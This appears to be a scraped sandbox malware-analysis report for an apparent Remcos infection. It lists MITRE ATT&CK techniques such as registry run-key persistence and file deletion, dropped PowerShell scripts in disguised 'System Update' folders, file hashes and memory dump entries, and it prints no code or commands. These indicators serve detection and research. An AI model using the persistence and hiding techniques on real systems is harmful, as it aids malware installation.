Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Defense Evasion

Indicator Removal

1

T1070

File Deletion

Modify Registry

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\remcos\logs.dat

Filesize
144B

MD5
0e2e7c75540ad364831bdcbe11bbec47

SHA1
d0d87cda06f8b41713de75a70ad43ed42c7090c3

SHA256
28460664b2c82fbbdd8f7ecf601cadc000185fc0d798a90742e120e1b371bc89

SHA512
ac73187a6280b3e6455e25940b21ea5e27c33fa0972c55209e2bf2aa96813e59985d291b5c45ff9522e352624f81c649d2c0f23d67c7d8d0ec573ecc5d31e272

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
6cf293cb4d80be23433eecf74ddb5503

SHA1
24fe4752df102c2ef492954d6b046cb5512ad408

SHA256
b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

SHA512
0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\oytea.ps1

Filesize
1.7MB

MD5
a690ac95dca8570a314b623bac55d658

SHA1
b569b9125f7018e938b124a327e387e756a0d82b

SHA256
bb18e81e4fd293d6761dc4b9152ed6b96b32d512aa805edafc4bcf3d9e1c68b2

SHA512
8b6cc3f469b7cd694683114d1de41b7c73ede4bf920c35f1762b3bbaca6c330fa3d1edc166dd15faab9070c6f586f101f2b04e12830f1d45c0648bcfbd0abaaf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\x2.ps1

Filesize
334B

MD5
33ec5c261d9ea9641f9b5557e5aa3dbf

SHA1
62473f7e3c0bacd495f992d8162e5ef326cd1c0d

SHA256
b48ee726a57804a1a03269325c7502a17351e9bc881a9b183819de701179c9b8

SHA512
f9b48ee0e41c056c6de73d610c72fa28e3d6412a927efa68ae2e7cfe64944a1e214e32fbd6b591d8894ae6baee009661214fb5e556fbf8381361b4f8131a5503

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
c2591b8d3c298836fc77aeec431b0a88

SHA1
56aed0d369ac0a912275f1d29075c78da932e2a7

SHA256
bfca64476080417d90c94877309a740be930c08c7d60bd2579ff9b523b4d9c9f

SHA512
95162e3fd633a27db36565cacc0c6e0ce220e080ca402849238cf4db42ed19772959c4d664a82cfbfeceac4271d49a0f1f5a2c0edceecbd100d7f7797a5211c8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
721991167161c45d61b03e4dbad4984b

SHA1
fd3fa85d142b5e8d4906d3e5bfe10c5347958457

SHA256
0a7be18529bdbed6fc9f36118a6147920d31099ee0fb5a2a8b6b934d1b9bcefb

SHA512
f1aa4f8e48eeb5b5279530d8557cb292a08b25ad46af0dd072130c395127f6c064c88b04910c626c13f22462104ac3d36fa0d4064fff0ec7528922df54ecdcf0

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xbjcu2hv.o2z.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/1464-61-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1464-79-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1464-103-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1464-102-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1464-95-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1464-94-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1464-87-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1464-86-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1464-59-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1464-78-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1464-63-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1464-64-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1464-67-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1464-68-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1464-69-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1464-70-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1464-71-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1508-6-0x0000010727270000-0x0000010727292000-memory.dmp

Filesize
136KB

Download
memory/1508-0-0x00007FFDEB623000-0x00007FFDEB625000-memory.dmp

Filesize
8KB

Download
memory/1508-25-0x00007FFDEB620000-0x00007FFDEC0E1000-memory.dmp

Filesize
10.8MB

Download
memory/1508-11-0x00007FFDEB620000-0x00007FFDEC0E1000-memory.dmp

Filesize
10.8MB

Download
memory/1508-46-0x00007FFDEB620000-0x00007FFDEC0E1000-memory.dmp

Filesize
10.8MB

Download
memory/1508-12-0x00007FFDEB620000-0x00007FFDEC0E1000-memory.dmp

Filesize
10.8MB

Download
memory/1508-24-0x00007FFDEB623000-0x00007FFDEB625000-memory.dmp

Filesize
8KB

Download
memory/2452-58-0x000002818C4B0000-0x000002818C4BA000-memory.dmp

Filesize
40KB

Download
memory/2588-22-0x000002347B3E0000-0x000002347B3EA000-memory.dmp

Filesize
40KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads